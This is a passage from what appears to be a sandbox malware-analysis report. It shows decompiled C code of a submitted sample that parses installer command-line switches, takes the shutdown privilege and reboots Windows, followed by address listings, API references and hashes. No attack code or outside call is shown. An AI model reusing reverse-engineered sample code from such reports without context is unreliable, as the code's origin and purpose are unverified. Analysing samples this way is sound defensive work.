                                                                                                                                                                                                    													_t111 = _t100 - 0xa;
                                                                                                                                                                                                    													if(_t111 == 0) {
                                                                                                                                                                                                    														if(_v266 != 0) {
                                                                                                                                                                                                    															if(_v266 != 0x3a) {
                                                                                                                                                                                                    																goto L49;
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																_t199 = _v265;
                                                                                                                                                                                                    																if(_t199 != 0) {
                                                                                                                                                                                                    																	_t219 =  &_v265;
                                                                                                                                                                                                    																	do {
                                                                                                                                                                                                    																		_t219 = _t219 + 1;
                                                                                                                                                                                                    																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                    																		if(_t115 == 0) {
                                                                                                                                                                                                    																			 *0x138a2c = 1;
                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                    																			_t200 = 2;
                                                                                                                                                                                                    																			_t119 = _t115 - _t200;
                                                                                                                                                                                                    																			if(_t119 == 0) {
                                                                                                                                                                                                    																				 *0x138a30 = 1;
                                                                                                                                                                                                    																			} else {
                                                                                                                                                                                                    																				if(_t119 == 0xf) {
                                                                                                                                                                                                    																					 *0x138a34 = 1;
                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                    																					_t209 = 0;
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																			}
                                                                                                                                                                                                    																		}
                                                                                                                                                                                                    																		_t118 =  *_t219;
                                                                                                                                                                                                    																		_t199 = _t118;
                                                                                                                                                                                                    																	} while (_t118 != 0);
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                    															 *0x138a2c = 1;
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    														goto L50;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														_t127 = _t111 - 3;
                                                                                                                                                                                                    														if(_t127 == 0) {
                                                                                                                                                                                                    															if(_v266 != 0) {
                                                                                                                                                                                                    																if(_v266 != 0x3a) {
                                                                                                                                                                                                    																	goto L49;
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                    																	if(_t129 == 0x31) {
                                                                                                                                                                                                    																		goto L76;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		if(_t129 == 0x41) {
                                                                                                                                                                                                    																			goto L83;
                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                    																			if(_t129 == 0x55) {
                                                                                                                                                                                                    																				goto L76;
                                                                                                                                                                                                    																			} else {
                                                                                                                                                                                                    																				goto L49;
                                                                                                                                                                                                    																			}
                                                                                                                                                                                                    																		}
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																L76:
                                                                                                                                                                                                    																_push(2);
                                                                                                                                                                                                    																_pop(1);
                                                                                                                                                                                                    																L83:
                                                                                                                                                                                                    																 *0x138a38 = 1;
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    															goto L50;
                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                    															_t132 = _t127 - 1;
                                                                                                                                                                                                    															if(_t132 == 0) {
                                                                                                                                                                                                    																if(_v266 != 0) {
                                                                                                                                                                                                    																	if(_v266 != 0x3a) {
                                                                                                                                                                                                    																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                    																			goto L49;
                                                                                                                                                                                                    																		}
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		_t201 = _v265;
                                                                                                                                                                                                    																		 *0x139a2c = 1;
                                                                                                                                                                                                    																		if(_t201 != 0) {
                                                                                                                                                                                                    																			_t220 =  &_v265;
                                                                                                                                                                                                    																			do {
                                                                                                                                                                                                    																				_t220 = _t220 + 1;
                                                                                                                                                                                                    																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                    																				if(_t142 == 0) {
                                                                                                                                                                                                    																					_t143 = 2;
                                                                                                                                                                                                    																					 *0x139a2c =  *0x139a2c | _t143;
                                                                                                                                                                                                    																					goto L70;
                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                    																					_t145 = _t142 - 3;
                                                                                                                                                                                                    																					if(_t145 == 0) {
                                                                                                                                                                                                    																						 *0x138d48 =  *0x138d48 | 0x00000040;
                                                                                                                                                                                                    																					} else {
                                                                                                                                                                                                    																						_t146 = _t145 - 5;
                                                                                                                                                                                                    																						if(_t146 == 0) {
                                                                                                                                                                                                    																							 *0x139a2c =  *0x139a2c & 0xfffffffd;
                                                                                                                                                                                                    																							goto L70;
                                                                                                                                                                                                    																						} else {
                                                                                                                                                                                                    																							_t147 = _t146 - 5;
                                                                                                                                                                                                    																							if(_t147 == 0) {
                                                                                                                                                                                                    																								 *0x139a2c =  *0x139a2c & 0xfffffffe;
                                                                                                                                                                                                    																								goto L70;
                                                                                                                                                                                                    																							} else {
                                                                                                                                                                                                    																								_t149 = _t147;
                                                                                                                                                                                                    																								if(_t149 == 0) {
                                                                                                                                                                                                    																									 *0x138d48 =  *0x138d48 | 0x00000080;
                                                                                                                                                                                                    																								} else {
                                                                                                                                                                                                    																									if(_t149 == 3) {
                                                                                                                                                                                                    																										 *0x139a2c =  *0x139a2c | 0x00000004;
                                                                                                                                                                                                    																										L70:
                                                                                                                                                                                                    																										 *0x138a28 = 1;
                                                                                                                                                                                                    																									} else {
                                                                                                                                                                                                    																										_t209 = 0;
                                                                                                                                                                                                    																									}
                                                                                                                                                                                                    																								}
                                                                                                                                                                                                    																							}
                                                                                                                                                                                                    																						}
                                                                                                                                                                                                    																					}
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																				_t144 =  *_t220;
                                                                                                                                                                                                    																				_t201 = _t144;
                                                                                                                                                                                                    																			} while (_t144 != 0);
                                                                                                                                                                                                    																		}
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	 *0x139a2c = 3;
                                                                                                                                                                                                    																	 *0x138a28 = 1;
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    																goto L50;
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																if(_t132 == 0) {
                                                                                                                                                                                                    																	goto L98;
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	L49:
                                                                                                                                                                                                    																	_t209 = 0;
                                                                                                                                                                                                    																	L50:
                                                                                                                                                                                                    																	_t173 = _v272;
                                                                                                                                                                                                    																	if( *_t173 != 0) {
                                                                                                                                                                                                    																		goto L2;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		break;
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											goto L106;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										L34:
                                                                                                                                                                                                    										_t209 = 0;
                                                                                                                                                                                                    										break;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L131;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if( *0x138a2c != 0 &&  *0x138b3e == 0) {
                                                                                                                                                                                                    						if(GetModuleFileNameA( *0x139a3c, 0x138b3e, 0x104) == 0) {
                                                                                                                                                                                                    							_t209 = 0;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t202 = 0x5c;
                                                                                                                                                                                                    							 *((char*)(E001366C8(0x138b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t63 = _t209;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				L131:
                                                                                                                                                                                                    			}


































































                                                                                                                                                                                                    0x00135c9e
                                                                                                                                                                                                    0x00135ca9
                                                                                                                                                                                                    0x00135cb0
                                                                                                                                                                                                    0x00135cb3
                                                                                                                                                                                                    0x00135cb6
                                                                                                                                                                                                    0x00135cb7
                                                                                                                                                                                                    0x00135cb8
                                                                                                                                                                                                    0x00135cbd
                                                                                                                                                                                                    0x00136204
                                                                                                                                                                                                    0x00135ccb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135ccb
                                                                                                                                                                                                    0x00135cd3
                                                                                                                                                                                                    0x00135cd7
                                                                                                                                                                                                    0x00135cf4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135cf4
                                                                                                                                                                                                    0x00135cf8
                                                                                                                                                                                                    0x00135d00
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135d06
                                                                                                                                                                                                    0x00135d06
                                                                                                                                                                                                    0x00135d0e
                                                                                                                                                                                                    0x00135d10
                                                                                                                                                                                                    0x00135d12
                                                                                                                                                                                                    0x00135d14
                                                                                                                                                                                                    0x00135d15
                                                                                                                                                                                                    0x00135d17
                                                                                                                                                                                                    0x00135d49
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135d19
                                                                                                                                                                                                    0x00135d19
                                                                                                                                                                                                    0x00135d1d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135d3f
                                                                                                                                                                                                    0x00135d3f
                                                                                                                                                                                                    0x00135d4b
                                                                                                                                                                                                    0x00135d4b
                                                                                                                                                                                                    0x00135d4f
                                                                                                                                                                                                    0x00135d8d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135d93
                                                                                                                                                                                                    0x00135d93
                                                                                                                                                                                                    0x00135d9a
                                                                                                                                                                                                    0x00135d9d
                                                                                                                                                                                                    0x00135d9e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135d9e
                                                                                                                                                                                                    0x00135d51
                                                                                                                                                                                                    0x00135d5b
                                                                                                                                                                                                    0x00135d72
                                                                                                                                                                                                    0x001360fb
                                                                                                                                                                                                    0x001360fb
                                                                                                                                                                                                    0x00136207
                                                                                                                                                                                                    0x0013620a
                                                                                                                                                                                                    0x0013620b
                                                                                                                                                                                                    0x0013620e
                                                                                                                                                                                                    0x00136217
                                                                                                                                                                                                    0x00135d78
                                                                                                                                                                                                    0x00135d78
                                                                                                                                                                                                    0x00135d80
                                                                                                                                                                                                    0x00135d83
                                                                                                                                                                                                    0x00135d84
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135d84
                                                                                                                                                                                                    0x00135d5d
                                                                                                                                                                                                    0x00135d5f
                                                                                                                                                                                                    0x00135d62
                                                                                                                                                                                                    0x00135d68
                                                                                                                                                                                                    0x00135d64
                                                                                                                                                                                                    0x00135d64
                                                                                                                                                                                                    0x00135d64
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135d62
                                                                                                                                                                                                    0x00135d5b
                                                                                                                                                                                                    0x00135d4f
                                                                                                                                                                                                    0x00135d1d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135d9f
                                                                                                                                                                                                    0x00135d9f
                                                                                                                                                                                                    0x00135da5
                                                                                                                                                                                                    0x00135dab
                                                                                                                                                                                                    0x00135dba
                                                                                                                                                                                                    0x00136218
                                                                                                                                                                                                    0x0013621d
                                                                                                                                                                                                    0x00136220
                                                                                                                                                                                                    0x00136221
                                                                                                                                                                                                    0x00136229
                                                                                                                                                                                                    0x00136230
                                                                                                                                                                                                    0x00136247
                                                                                                                                                                                                    0x0013626a
                                                                                                                                                                                                    0x00136272
                                                                                                                                                                                                    0x00136249
                                                                                                                                                                                                    0x00136255
                                                                                                                                                                                                    0x0013625f
                                                                                                                                                                                                    0x00136264
                                                                                                                                                                                                    0x00136264
                                                                                                                                                                                                    0x00136284
                                                                                                                                                                                                    0x00135dc0
                                                                                                                                                                                                    0x00135dc0
                                                                                                                                                                                                    0x00135dca
                                                                                                                                                                                                    0x00135e22
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135dcc
                                                                                                                                                                                                    0x00135dce
                                                                                                                                                                                                    0x00135e24
                                                                                                                                                                                                    0x00135e24
                                                                                                                                                                                                    0x00135e2c
                                                                                                                                                                                                    0x00135e47
                                                                                                                                                                                                    0x00135e4a
                                                                                                                                                                                                    0x001361d2
                                                                                                                                                                                                    0x001361e2
                                                                                                                                                                                                    0x001361e7
                                                                                                                                                                                                    0x001361ee
                                                                                                                                                                                                    0x001361f1
                                                                                                                                                                                                    0x001361f1
                                                                                                                                                                                                    0x001361f8
                                                                                                                                                                                                    0x001361f8
                                                                                                                                                                                                    0x00135e50
                                                                                                                                                                                                    0x00135e53
                                                                                                                                                                                                    0x00136109
                                                                                                                                                                                                    0x0013611f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00136125
                                                                                                                                                                                                    0x00136137
                                                                                                                                                                                                    0x0013613a
                                                                                                                                                                                                    0x0013613c
                                                                                                                                                                                                    0x0013613e
                                                                                                                                                                                                    0x0013613e
                                                                                                                                                                                                    0x00136141
                                                                                                                                                                                                    0x00136141
                                                                                                                                                                                                    0x00136143
                                                                                                                                                                                                    0x00136144
                                                                                                                                                                                                    0x0013614a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00136150
                                                                                                                                                                                                    0x00136152
                                                                                                                                                                                                    0x0013615c
                                                                                                                                                                                                    0x00136170
                                                                                                                                                                                                    0x00136172
                                                                                                                                                                                                    0x0013617c
                                                                                                                                                                                                    0x00136190
                                                                                                                                                                                                    0x00136190
                                                                                                                                                                                                    0x00136196
                                                                                                                                                                                                    0x001361a5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001361ab
                                                                                                                                                                                                    0x001361b9
                                                                                                                                                                                                    0x001361c6
                                                                                                                                                                                                    0x001361c6
                                                                                                                                                                                                    0x0013617e
                                                                                                                                                                                                    0x00136180
                                                                                                                                                                                                    0x0013618a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013618a
                                                                                                                                                                                                    0x0013615e
                                                                                                                                                                                                    0x00136160
                                                                                                                                                                                                    0x0013616a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013616a
                                                                                                                                                                                                    0x0013615c
                                                                                                                                                                                                    0x0013614a
                                                                                                                                                                                                    0x0013610b
                                                                                                                                                                                                    0x0013610e
                                                                                                                                                                                                    0x0013610e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135e59
                                                                                                                                                                                                    0x00135e59
                                                                                                                                                                                                    0x00135e5c
                                                                                                                                                                                                    0x0013604f
                                                                                                                                                                                                    0x00136056
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013605c
                                                                                                                                                                                                    0x0013606e
                                                                                                                                                                                                    0x00136071
                                                                                                                                                                                                    0x00136073
                                                                                                                                                                                                    0x00136075
                                                                                                                                                                                                    0x00136075
                                                                                                                                                                                                    0x00136078
                                                                                                                                                                                                    0x00136078
                                                                                                                                                                                                    0x0013607a
                                                                                                                                                                                                    0x0013607b
                                                                                                                                                                                                    0x00136081
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00136087
                                                                                                                                                                                                    0x00136087
                                                                                                                                                                                                    0x0013608d
                                                                                                                                                                                                    0x0013609c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001360a2
                                                                                                                                                                                                    0x001360aa
                                                                                                                                                                                                    0x001360b2
                                                                                                                                                                                                    0x001360b7
                                                                                                                                                                                                    0x001360bd
                                                                                                                                                                                                    0x001360bf
                                                                                                                                                                                                    0x001360bf
                                                                                                                                                                                                    0x001360d6
                                                                                                                                                                                                    0x001360e0
                                                                                                                                                                                                    0x001360e7
                                                                                                                                                                                                    0x001360f5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001360f5
                                                                                                                                                                                                    0x0013609c
                                                                                                                                                                                                    0x00136081
                                                                                                                                                                                                    0x00135e62
                                                                                                                                                                                                    0x00135e62
                                                                                                                                                                                                    0x00135e65
                                                                                                                                                                                                    0x00135fd3
                                                                                                                                                                                                    0x00135fe9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135fef
                                                                                                                                                                                                    0x00135fef
                                                                                                                                                                                                    0x00135ff7
                                                                                                                                                                                                    0x00135ffd
                                                                                                                                                                                                    0x00136003
                                                                                                                                                                                                    0x00136006
                                                                                                                                                                                                    0x00136011
                                                                                                                                                                                                    0x00136014
                                                                                                                                                                                                    0x0013603d
                                                                                                                                                                                                    0x00136016
                                                                                                                                                                                                    0x00136018
                                                                                                                                                                                                    0x00136019
                                                                                                                                                                                                    0x0013601b
                                                                                                                                                                                                    0x00136033
                                                                                                                                                                                                    0x0013601d
                                                                                                                                                                                                    0x00136020
                                                                                                                                                                                                    0x00136029
                                                                                                                                                                                                    0x00136022
                                                                                                                                                                                                    0x00136022
                                                                                                                                                                                                    0x00136022
                                                                                                                                                                                                    0x00136020
                                                                                                                                                                                                    0x0013601b
                                                                                                                                                                                                    0x00136042
                                                                                                                                                                                                    0x00136044
                                                                                                                                                                                                    0x00136046
                                                                                                                                                                                                    0x0013604a
                                                                                                                                                                                                    0x00135ff7
                                                                                                                                                                                                    0x00135fd5
                                                                                                                                                                                                    0x00135fd8
                                                                                                                                                                                                    0x00135fd8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135e6b
                                                                                                                                                                                                    0x00135e6b
                                                                                                                                                                                                    0x00135e6e
                                                                                                                                                                                                    0x00135f8b
                                                                                                                                                                                                    0x00135f99
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135f9f
                                                                                                                                                                                                    0x00135fa7
                                                                                                                                                                                                    0x00135faf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135fb1
                                                                                                                                                                                                    0x00135fb3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135fb5
                                                                                                                                                                                                    0x00135fb7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135fb9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135fb9
                                                                                                                                                                                                    0x00135fb7
                                                                                                                                                                                                    0x00135fb3
                                                                                                                                                                                                    0x00135faf
                                                                                                                                                                                                    0x00135f8d
                                                                                                                                                                                                    0x00135f8d
                                                                                                                                                                                                    0x00135f8d
                                                                                                                                                                                                    0x00135f8f
                                                                                                                                                                                                    0x00135fc1
                                                                                                                                                                                                    0x00135fc1
                                                                                                                                                                                                    0x00135fc1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135e74
                                                                                                                                                                                                    0x00135e74
                                                                                                                                                                                                    0x00135e77
                                                                                                                                                                                                    0x00135ea0
                                                                                                                                                                                                    0x00135ebd
                                                                                                                                                                                                    0x00135f79
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135f7f
                                                                                                                                                                                                    0x00135ec3
                                                                                                                                                                                                    0x00135ec3
                                                                                                                                                                                                    0x00135ecc
                                                                                                                                                                                                    0x00135ed4
                                                                                                                                                                                                    0x00135ed6
                                                                                                                                                                                                    0x00135edc
                                                                                                                                                                                                    0x00135edf
                                                                                                                                                                                                    0x00135eea
                                                                                                                                                                                                    0x00135eed
                                                                                                                                                                                                    0x00135f3f
                                                                                                                                                                                                    0x00135f40
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135eef
                                                                                                                                                                                                    0x00135eef
                                                                                                                                                                                                    0x00135ef2
                                                                                                                                                                                                    0x00135f34
                                                                                                                                                                                                    0x00135ef4
                                                                                                                                                                                                    0x00135ef4
                                                                                                                                                                                                    0x00135ef7
                                                                                                                                                                                                    0x00135f2b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135ef9
                                                                                                                                                                                                    0x00135ef9
                                                                                                                                                                                                    0x00135efc
                                                                                                                                                                                                    0x00135f22
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135efe
                                                                                                                                                                                                    0x00135eff
                                                                                                                                                                                                    0x00135f02
                                                                                                                                                                                                    0x00135f16
                                                                                                                                                                                                    0x00135f04
                                                                                                                                                                                                    0x00135f07
                                                                                                                                                                                                    0x00135f0d
                                                                                                                                                                                                    0x00135f46
                                                                                                                                                                                                    0x00135f46
                                                                                                                                                                                                    0x00135f09
                                                                                                                                                                                                    0x00135f09
                                                                                                                                                                                                    0x00135f09
                                                                                                                                                                                                    0x00135f07
                                                                                                                                                                                                    0x00135f02
                                                                                                                                                                                                    0x00135efc
                                                                                                                                                                                                    0x00135ef7
                                                                                                                                                                                                    0x00135ef2
                                                                                                                                                                                                    0x00135f4c
                                                                                                                                                                                                    0x00135f4e
                                                                                                                                                                                                    0x00135f50
                                                                                                                                                                                                    0x00135f54
                                                                                                                                                                                                    0x00135ed4
                                                                                                                                                                                                    0x00135ea2
                                                                                                                                                                                                    0x00135ea4
                                                                                                                                                                                                    0x00135eaf
                                                                                                                                                                                                    0x00135eaf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135e79
                                                                                                                                                                                                    0x00135e7d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135e83
                                                                                                                                                                                                    0x00135e83
                                                                                                                                                                                                    0x00135e83
                                                                                                                                                                                                    0x00135e85
                                                                                                                                                                                                    0x00135e85
                                                                                                                                                                                                    0x00135e8e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135e94
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135e94
                                                                                                                                                                                                    0x00135e8e
                                                                                                                                                                                                    0x00135e7d
                                                                                                                                                                                                    0x00135e77
                                                                                                                                                                                                    0x00135e6e
                                                                                                                                                                                                    0x00135e65
                                                                                                                                                                                                    0x00135e5c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135dd0
                                                                                                                                                                                                    0x00135dd0
                                                                                                                                                                                                    0x00135dd0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135dd0
                                                                                                                                                                                                    0x00135dce
                                                                                                                                                                                                    0x00135dca
                                                                                                                                                                                                    0x00135dba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135d00
                                                                                                                                                                                                    0x00135dd9
                                                                                                                                                                                                    0x00135e04
                                                                                                                                                                                                    0x001361fe
                                                                                                                                                                                                    0x00135e0a
                                                                                                                                                                                                    0x00135e0c
                                                                                                                                                                                                    0x00135e17
                                                                                                                                                                                                    0x00135e17
                                                                                                                                                                                                    0x00135e04
                                                                                                                                                                                                    0x00136200
                                                                                                                                                                                                    0x00136200
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CharNextA.USER32(?,00000000,?,?), ref: 00135CEE
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00138B3E,00000104,00000000,?,?), ref: 00135DFC
                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 00135E3E
                                                                                                                                                                                                    • CharUpperA.USER32(-00000052), ref: 00135EE1
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00135F6F
                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 00135FA7
                                                                                                                                                                                                    • CharUpperA.USER32(-0000004E), ref: 00136008
                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 001360AA
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00131140,00000000,00000040,00000000), ref: 001361F1
                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 001361F8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                    • String ID: "$"$:$RegServer
                                                                                                                                                                                                    • API String ID: 1203814774-25366791
                                                                                                                                                                                                    • Opcode ID: 7c93c247ccd907871921f3fd71e5a2353c86f8c7e55057d53dfb061fceaf3e22
                                                                                                                                                                                                    • Instruction ID: d733ba133846f485a4f140595dd7ca6d6463c881cf6e6dac8deadefe806cacc1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c93c247ccd907871921f3fd71e5a2353c86f8c7e55057d53dfb061fceaf3e22
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CD17D71A04A546EDF398B388C483FA7FA7AB16B04F1441B9D4DAD7591DBB08EC68F40
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 60%
                                                                                                                                                                                                    			E00131F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                    				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				signed int _t13;
                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                    				int _t28;
                                                                                                                                                                                                    				signed char _t30;
                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t41 = __esi;
                                                                                                                                                                                                    				_t38 = __edi;
                                                                                                                                                                                                    				_t30 = __ecx;
                                                                                                                                                                                                    				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                    						if( *0x139a40 != 0) {
                                                                                                                                                                                                    							_pop(_t30);
                                                                                                                                                                                                    							_t44 = _t46;
                                                                                                                                                                                                    							_t13 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                    							_push(_t38);
                                                                                                                                                                                                    							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                    								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                    								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                    								_v12 = 2;
                                                                                                                                                                                                    								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                    								CloseHandle(_v28);
                                                                                                                                                                                                    								_t41 = _t41;
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								if(_t21 != 0) {
                                                                                                                                                                                                    									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                    										_t25 = 1;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t37 = 0x4f7;
                                                                                                                                                                                                    										goto L3;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t37 = 0x4f6;
                                                                                                                                                                                                    									goto L4;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t37 = 0x4f5;
                                                                                                                                                                                                    								L3:
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								L4:
                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								E001344B9(0, _t37);
                                                                                                                                                                                                    								_t25 = 0;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_pop(_t40);
                                                                                                                                                                                                    							return E00136CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t37 = 0x522;
                                                                                                                                                                                                    						_t28 = E001344B9(0, 0x522, 0x131140, 0, 0x40, 4);
                                                                                                                                                                                                    						if(_t28 != 6) {
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
